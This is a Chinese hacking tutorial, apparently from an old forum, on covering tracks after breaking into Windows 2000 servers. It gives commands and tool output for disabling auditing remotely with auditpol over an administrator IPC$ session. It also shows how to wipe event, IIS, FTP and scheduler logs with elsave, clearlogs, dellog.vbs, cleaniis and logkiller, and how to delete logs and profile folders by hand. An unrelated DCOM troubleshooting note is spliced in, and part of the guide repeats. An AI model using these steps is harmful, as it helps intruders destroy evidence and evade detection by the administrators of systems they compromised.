建立審覈的跟蹤記錄是安全性的重要內容。監視對象的創建和修改提供了追蹤潛在安全性問題的方法,幫助確保用戶帳戶的可用性並在可能出現安全性破壞事件時提供證據。 對系統執行與安全性相關的審覈有三個主要步驟。
首先,必須打開要審覈的事件類別。用戶登錄註銷和帳戶管理就是事件類別的典型例子。選定的事件類別組成了審覈策略。第一次安裝 Windows 2000 時,沒有選中任何類別,也就沒有強制的審覈策略。"計算機管理"列出了可以審覈的事件類別。
其次,必須設置安全日誌的大小和行爲。
最後,如果您已經選擇了審覈目錄服務訪問類別或審覈對象訪問類別,則必須確定要監視訪問的對象並相應地修改其安全描述符。例如,如果要審覈用戶爲打開特定文件所做的嘗試,可以針對特定事件在該文件上直接設置成功或失敗屬性。
那麼對付審覈策略我們這裏有一個非常強大的工具auditpol.exe,這個是命令行下的審覈策略配置實用程序。如圖一。
有沒有發現"審覈策略"裏的每個策略是不是和該命令行下的Category提供的很像啊?其實就是一模一樣的啦。再結合Option參數的設置不就完全能夠實現與本地設置策略的效果一樣一樣了嗎!如圖二。
下面,還是讓我們來看看如何使用吧,很簡單的。LOOK 當然先查看一下當前的"審覈策略"是個什麼樣子的。上面是爲了能夠看出該工具的效果,我將所有的策略全部都關閉了。如果那臺"肉雞"的系統也是這個樣子的話,那最好了。都省了過多的使用這個工具了。不過爲了安全還是要檢查一下的。 結果如圖三。
可是往往系統管理員會或多或少的開啓一些的瞭如圖四。
這樣,我們如果在對該系統肆意操作之前就得先將這些開啓的審覈全部關閉。目的我不用說大家也該明白。呵呵,接着操作吧。利用/disable參數來關閉全部。
輸入auditpol.exe /disable 來關閉所有的審覈。
當然爲了做完該做的事後,還是要原封不動的還原咯。我是個追求完美主義者。可是有人會說剛纔我記不得哪些是開啓哪些是關閉的了,怎麼辦呢?沒關係的這樣才完美嘛:如圖五。
另外上面演示的是在本地,如果要遠程呢??呵呵我們來看看:
F:>net use //192.168.1.30/ipc$ password /u:administrator
命令成功完成。
F:/>auditpol.exe //192.168.1.30 /enable /system:all /logon:all /account:success
Running ...
Audit information changed successfully on //192.168.1.30 ...
New audit policy on //192.168.1.30 ...
System = Success and Failure
Logon = Success and Failure
Object Access = No Privilege
Use = No Process
Tracking = No
Policy Change = No
Account Management = No
Directory Service Access = No
Account Logon = Success
如果要關閉把上面的enable改成disable就可以啦!~~~~~~~~
審覈策略就說到這裏,還想繼續瞭解的可以去參考有關書籍。接着上面說,知道了那3個系統自帶的日誌後,我們來看看怎麼清除。首先看看基於ipc的遠程刪除日誌的工具:一個是elsave,這個大家都很瞭解了吧,如下:
F:/tools/rizhi>elsave
elsave: You must use -F and/or -C
F:/tools/rizhi>elsave /?
usage: elsave [-s //server] [-l log] [-F file] [-C] [-q]
Saves and/or clears a Windows NT event log. Version 0.4 19980907.
-s //server Server for which you want to save or clear the log.
-l log Name of log to save or clear.
-F file Save the log to a file with this name. Must be absolute path to
local file on the server for which you want to save the log.
-C Clear the log.
-q Write errors to the event log
那麼我要刪除遠程機器的應用程序日誌命令格式如下:
elsave -s //192.168.0.77 -l "application" -C
同樣的要刪除安全日誌和系統日誌,就在-l參數後跟上“security”和“system”來。
另外一個工具是clearlogs使用說明如下:
F:/tools/rizhi>clearlogs
ClearLogs 1.0 - (c) 2002, Arne Vidstrom ([email protected])
- http://ntsecurity.nu/toolbox/clearlogs/
Usage: clearlogs [//computername] <-app / -sec / -sys>
-app = application log
-sec = security log
-sys = system log
比elsave簡單多了是不是啊,呵呵!~~~~~我在此就不再贅述。這兩個工具都需要你建立ipc連接來完成,那麼如果沒有ipc怎麼辦啊。那就是基於wmi(windows 管理規範)來清除了。
如下:
F:/tools/rizhi>cscript dellog.vbs
Microsoft (R) Windows 腳本宿主版本 5.1 for Windows
版權所有(C) Microsoft Corporation 1996-1999. All rights reserved.
*******************************************************************************
RCLS v1.06
Remote Clear eventLogs Script, by zzzEVAzzz
Welcome to visite www.isgrey.com
Usage:
cscript F:/tools/rizhi/dellog.vbs targetIP username password [lognamelist]
lognamelist:
logname1[,logname2...] clear specified logs
*|-a|-all clear all logs
-v|-view|NULL enum log names
*******************************************************************************
可以刪除指定的日誌,也可以全部刪除,是不是很容易咧。呵呵!~~~~~~
好了系統自帶的日誌我就介紹到這裏。下面我們來看看,IIS日誌。
二。IIS日誌。IIS日誌保存在%systemroot%/system32/logfiles/下。如果啓動了web server的話,那麼就會在上述路徑下多出一個W3SVC1的文件夾,用來存儲web服務日誌。
如果也啓動了iis 自帶的ftp服務,那麼還有會有個MSFTPSVC1的文件夾,裏面是ftp的日誌。
讓我們來看看本地清除,要用到的工具是cleaniis.exe如下:
F:/tools/rizhi>cleaniis
iisantidote <logfile dir> <ip or string to hide>
iisantidote <logfile dir><ip or string to hide> stop
stop opiton will stop iis before clearing the files and restart it after
<logfile dir> exemple : c:/winnt/system32/logfiles/w3svc1/ dont forget the /
什麼意思呢??我來給大家舉個例子吧:
cleaniis c:/winnt/system32/logfiles/w3svc1/ 10.24.9.100
//清除log中所有此IP地址的訪問記錄.
cleaniis c:/winnt/system32/logfiles/w3svc1/ /shop/admin/
//清除log中所有對此目錄的訪問記錄.
cleaniis c:/winnt/system32/logfiles/w3svc1/ 10.24.9.100 stop
//使用stop參數進行日誌清除.
與此類似的還有一個工具如下:
F:/tools/rizhi>clog
CleanIISLog Ver 0.1, by Assassin 2001. All Rights Reserved.
Usage: CleanIISLog <LogFile>|<.> <CleanIP>|<.>
LogFile - Specify Log File Which You Want Process.
Specified "ALL" Will Process All Log Files.
CleanIP - Specify IP Address Which You Want Clear.
Specified "." Will Clean All IP Record.
這個跟上面的工具是差不多的,我就不再贅述了我只舉個例子:
clog ALL 192.168.1.30 //清楚所有日誌裏的此IP的記錄!~~~~~
IIS日誌我還沒找到過遠程刪除的,上面我提到的那個dellog.vbs好象是可以,大家可以測試一下。
三。終端服務的日誌。3. 清空終端服務的日誌只有在圖形界面控制下去完成了。這是因爲終端服務的開啓日誌的配置的特殊性所造成的。我們還是來討論討論吧。首先要知道如果存在終端服務,如果管理員開啓了日誌,設置該日誌記錄的位置會在什麼地方。如下圖,先打開"終端服務配置",找到"連接"裏的RDP-tcp。並右擊其"屬性"。
點擊"環境"選項卡,看看管理員是否運行了什麼用來作日誌記錄的程序。(記得shotgun寫過相關的BAT文件,大家有興趣的話,可以在網上查找一下,一定有的。)這是一個會作日誌記錄的地方。
接下來就是"權限"選項卡里的"高級"選項了。點擊進去看一看吧!
點擊進去後,如圖9所示。在"審覈"選項卡里可以確認是否對某些組,某些帳號配置了審覈。不過大家放心這個審覈是記錄在事件查看器裏的。上面我們已介紹過如何清除了。
好了,據我所知終端服務的日誌記錄就是在這兩個地方配置的。若有遺漏還請大家多多指教啊!謝謝。
提醒大家注意,如果你是通過GUI或終端服務連接對方服務器的話,一定要記住將Documents and Settings裏對應登錄的帳號文件夾給刪了。可別忘了啊…。
RMDIR [/S] [/Q] [驅動器:]路徑
RD [/S] [/Q] [驅動器:]路徑
/S 除目錄本身外,還將刪除指定目錄下的所有子目錄和 文件。用於刪除目錄樹。
/Q 安靜模式,加 /S 時,刪除目錄樹結構不再要求確認
這裏還有個工具,本地運行來清除歷史記錄等等運行情況如下:
F:/tools/rizhi>cleaner
Cleaner V1.0 - Deletes IE Temp Files, Cookies And History By WinEggDrop
Cleaning Temp Files And Cookies......OK
Cleaning History......OK
Cleaning The Recent Documents......OK
是不是很全面啊,呵呵不錯的工具!黑吧有下載啊!~~~~~~~~~
五一長假我還在寫,累啊!~~~~~~~~~~555,
好了怎麼利用工具清除日誌我都給大家介紹的很清楚了。至於任何手工清除日誌我這裏就不再多少了,找到日誌的存放的目錄用命令行下的刪除命令來刪除(如上我已經介紹了rmdir等命令的參數),如果碰到刪除不了的很有可能是正在使用,可以給他改一下名字,再刪除。
如果大家使用了計劃任務那麼你還要刪除計劃任務的日誌工具運用如下:
F:/tools/rizhi>logkiller
Log Killer V1.0 By WinEggDrop
Cleaning Event Logs......
Clean Application Event Log Successfully
Clean Security Event Log Successfully
Clean System Event Log Successfully
-----------------------------------------------------------------------------
Backing Up Services Status...... Done
-----------------------------------------------------------------------------
Stopping Services......
The Service "MSFTPSVC" Doesn't Exist
Stopping The Service "SMTPSVC"......
Stopping The Service "W3SVC"......
Stopping The Service "SCHEDULE"......
-----------------------------------------------------------------------------
Deleting All Log Files......
Delete C:/WINNT/System32/LogFiles/W3SVC1/ex000811.log Successfully
Remove Directory C:/WINNT/System32/LogFiles/W3SVC1 Succesfully
Remove Directory C:/WINNT/System32/LogFiles Succesfully
-----------------------------------------------------------------------------
Deleting Schedule Event Log File......
Delete C:/WINNT/SchedLgU.txt Successfully
-----------------------------------------------------------------------------
Restoring Services Status......
Starting Service "SMTPSVC"
Starting Service "W3SVC"
Starting Service "SCHEDULE"
-----------------------------------------------------------------------------
Mission Accomplished
看到了嗎??這個工具非常的全面,在命令行下直接輸入logkiller就可以了,以刪除的日誌如下
1.刪除"應用程序日誌","安全日誌"和"系統日誌"
2.刪除IIS,系統本身FTP服務,系統本身SMTP服務日誌
3.刪除計劃任務日誌
不錯吧!~~~~~
我想想啊,還有什麼沒說到的!~~~~~~~~~~~哦靠,對了還有一點,日誌清除的順序,一定要先把審覈停掉(如果有的話)再清除iis日誌和ftp 等包括計劃任務的日誌,最後纔是應用程序日誌,安全日誌和系統日誌,別忘了再把審覈給打開。
一個2000的日誌清除器是怎麼練成的
我想大想一定用過小榕的CLeanIIsLog,是一個不錯的日誌清除工具。不過可惜,只
能清除IIS的日誌,那ftp和shedule待產生的日誌文件呢,我們一般只能手動清除。
Windows2000的日誌文件通常有應用程序日誌,安全日誌、系統日誌、DNS服務器日誌、
FTP日誌、WWW日誌等等,可能會根據服務器所開啓的服務不同。
一般步驟如下:
1.清除IIs的日誌。
可不要小看IIS的日誌功能,它可以詳細的記錄下你的入侵全過程,如
如你用unicode入侵時ie裏打的命令,和對80端口掃描時留下的痕跡。你可能就因爲對
其不注意,而被網管盯上,說不定還會.......呵呵
那我們就可手動清除吧
1.日誌的默認位置:%systemroot%/system32/logfiles/w3svc1/,默認每天一個日誌
那我們就切換到這個目錄下吧
del *.*
你大概想是安全了吧,那就dir一下吧
咦,咦,今天的日誌怎麼還在,不要慌。因爲w3svc服務還開着,那我們怎麼清除這個日誌文件呢?
方法一:如有3389可以登錄,那就用notepad打開,把Ctrl+A 然後del吧。
方法二:net 命令
C:/>net stop w3svc
World Wide Web Publishing Service 服務正在停止.(可能會等很長的時間,也可能不成功)
World Wide Web Publishing Service 服務已成功停止。
好了w3svc停止了,我們可以清空它的日誌了,del *.*吧
還有不要忘了再打開w3svc服務呀
C:/>net start w3svc
2.清除ftp日誌。
FTP日誌默認位置:%systemroot%/sys tem32/logfiles/msftpsvc1/,默認每天一個日誌
清除方法同上
3.清除Scheduler日誌
Scheduler服務日誌默認位置:%systemroot%/schedlgu.txt
清除方法同上
4.應用程序日誌、安全日誌、系統日誌、DNS日誌默認位置:%systemroot%/sys tem32/config
清除方法同上
注意以上三個目錄可能不在上面的位置,那是因爲管理員做的修改
可以讀取註冊表值得到他們的位置
應用程序日誌,安全日誌,系統日誌,DNS服務器日誌,它們這些LOG文件在註冊表中的:
HKEY_LOCAL_MACHINE/sys tem/CurrentControlSet/Services/Eventlog
Schedluler服務日誌在註冊表中
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/SchedulingAgent
5.我是借鑑了別人文章(其實就是抄了)
OK!恭喜,現在簡單的日誌都已成功刪除。下面就是很難的安全日誌和系統日誌了,守護這些日誌的服務是Event Log,試着停掉它!
D:/SERVER/sys tem32/LogFiles/W3SVC1>net stop eventlog
這項服務無法接受請求的 "暫停" 或 "停止" 操作。
KAO,I 服了 U,沒辦法,它是關鍵服務。如果不用第三方工具,在命令行上根本沒有刪除安全日誌和系統日誌的可能!所以還是得用雖然簡單但是速度慢得死機的辦法:打開“控制面板”的“管理工具”中的“事件查看器”(98沒有,知道用Win2k的好處了吧),在菜單的“操作”項有一個名爲“連接到另一臺計算機”的菜單,
輸入遠程計算機的IP,耐心等上數十分鐘,
選擇遠程計算機的安全性日誌,右鍵選擇它的屬性:
點擊屬性裏的“清除日誌”按鈕,OK!安全日誌清除完畢!同樣的忍受痛苦去清除系統日誌!
6.上面大部分重要的日誌你都已經清除了。然後要做的就是以防萬一還有遺漏的了。
那就這樣做吧 del以下的一些文件
/winnt/*.log
system32下
/logfiles/*.*
/dtclog/*.*
/config/*.evt
/*.log
/*.txt
其實這篇文章的主要日的,不是教你怎麼清除日誌,而是教你寫一個日誌清除的工具。
如果你還學不會,那就到黑吧去學吧~`
現在轉入正題:
你已經瞭解了,要清除一些日誌,首先要關閉一些服務程序
我推薦你選用一個可以看機器的服務程序的dos小工具,具體實現看以前的文章
《如果做一個dos下的服務程序查看器》
工具名serName.exe
運行一下serName.exe吧
serName.exe -t 1 -t 1
呵呵,所有的機器正在運行的服務程序顯示出來了吧。
記住你要關的服務程序名吧。
最近發現許多win2000的電腦在日誌中出現如下DCOM錯誤的記錄, 並且, 該日誌幾乎每時每該都在產生, 以致於清空日誌後一天之內事件查看器就會爆滿.
內容如下:
<見圖>
事件類型: 錯誤
事件來源: DCOM
事件種類: 無
事件 ID: 10002
日期: 2004-5-30
事件: 16:42:59
用戶: N/A
計算機: DDMDD
描述:
啓動 DCOM 服務器的訪問被拒絕。 服務器是:
{00020906-0000-0000-C000-000000000046}
用戶是 Unavailable/Unavailable, SID=Unavailable.
雖然並不影響正常使用, 每次開機時彈出一個提示日誌已滿的窗口總覺得令人不舒服. 在網上搜索,也都是在論壇裏有人提問,沒有有效的解決辦法.於是在微軟網站找了一下.參考了一些相關資料
http://support.microsoft.com/default.aspx?scid=kb;en-us;298095
http://support.microsoft.com/default.aspx?scid=kb;en-us;290398
仍未能解決問題. 最後想到禁用DCOM, 打開DOS窗口, 運行
dcomcnfg
在默認屬性裏取消選擇"在這臺計算機上啓用分佈式COM". <如圖>
重啓後就會發現日誌查看器已經乾淨多了.
注意,根據微軟資料:
如果禁用 DCOM,則操作系統可能會失去某些功能。禁用對 DCOM 的支持後,可能會導致以下結果:
任何能被遠程激活的 COM 對象都可能無法正常工作。
本地 COM+ 管理單元將不能連接到遠程服務器上以枚舉它們的 COM+ 編錄。
證書自動註冊可能無法正常工作。
Windows 管理規範 (WMI) 對遠程服務器的查詢可能無法正常工作。
不過這些暫時還沒有感覺到.
Windows2000的日誌文件通常有應用程序日誌、安全日誌、系統日誌、DNS服務器日誌、FTP日誌、WWW日誌等等,可能會根據服務器所開啓的服務不同。
一般步驟如下:
1.清除IIS的日誌。
可不要小看IIS的日誌功能,它可以詳細的記錄下你的入侵全過程,如你用unicode入侵時ie裏打的命令,和對80端口掃描時留下的痕跡。你可能就因爲對其不注意,而被網管盯上,說不定還會…… 呵呵。
那我們就可手動清除吧:
1. 日誌的默認位置:%systemroot%/system32/logfiles/w3svc1/,默認每天一個日誌。那我們就切換到這個目錄下吧,然後 del *.*。你大概想是安全了吧,那就dir一下吧。…… 咦,咦,今天的日誌怎麼還在?不要慌!因爲w3svc服務還開着,那我們怎麼清除這個日誌文件呢?
方法一: 如有3389可以登錄,那就用notepad打開,按Ctrl+A 然後del吧。
方法二: net 命令
C:/>net stop w3svc
World Wide Web Publishing Service 服務正在停止。(可能會等很長的時間,也可能不成功)
World Wide Web Publishing Service 服務已成功停止。
好了w3svc停止了,我們可以清空它的日誌了, del *.*吧
還有不要忘了再打開w3svc服務呀!
C:/>net start w3svc
2. 清除ftp日誌
FTP日誌默認位置:%systemroot%/sys tem32/logfiles/msftpsvc1/,默認每天一個日誌,清除方法同上。
3. 清除Scheduler日誌
Scheduler服務日誌默認位置:%systemroot%/schedlgu.txt。清除方法同上。
4. 應用程序日誌、安全日誌、系統日誌、DNS日誌默認位置:%systemroot%/sys tem32/config 。清除方法同上。
注意以上三個目錄可能不在上面的位置,那是因爲管理員做了修改。可以讀取註冊表值得到他們的位置:
應用程序日誌,安全日誌,系統日誌,DNS服務器日誌,它們這些LOG文件在註冊表中的
HKEY_LOCAL_MACHINE/sys tem/CurrentControlSet/Services/Eventlog
Schedluler服務日誌在註冊表中的
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/SchedulingAgent
OK!恭喜,現在簡單的日誌都已成功刪除。下面就是很難的安全日誌和系統日誌了,守護這些日誌的服務是Event Log,試着停掉它!
D:/SERVER/system32/LogFiles/W3SVC1>net stop eventlog
這項服務無法接受請求的 "暫停" 或 "停止" 操作。沒辦法,它是關鍵服務。如果不用第三方工具,在命令行上根本沒有刪除安全日誌和系統日誌的可能!所以還是得用雖然簡單但是速度慢得死機的辦法:打開“控制面板”的“管理工具”中的“事件查看器”(98沒有,知道用Win2k的好處了吧),在菜單的“操作”項有一個名爲“連接到另一臺計算機”的菜單,點擊它然後輸入遠程計算機的IP,然後點支菸,等上數十分鐘,忍受象死機的折磨,終於打開了!然後選擇遠程計算機的安全性日誌,右鍵選擇它的屬性,點擊屬性裏的“清除日誌”按鈕,OK!安全日誌清除完畢!同樣的忍受痛苦去清除系統日誌!
5.上面大部分重要的日誌你都已經清除了。然後要做的就是以防萬一還有遺漏的了。
那就這樣做吧:
del以下的一些文件:
/winnt/*.log
system32下
/logfiles/*.*
/dtclog/*.*
/config/*.evt
/*.log
/*.txt
到此爲止,我常用的清除日誌方法是不是對你也有幫助,我相信很朋友都能派上用場了吧。
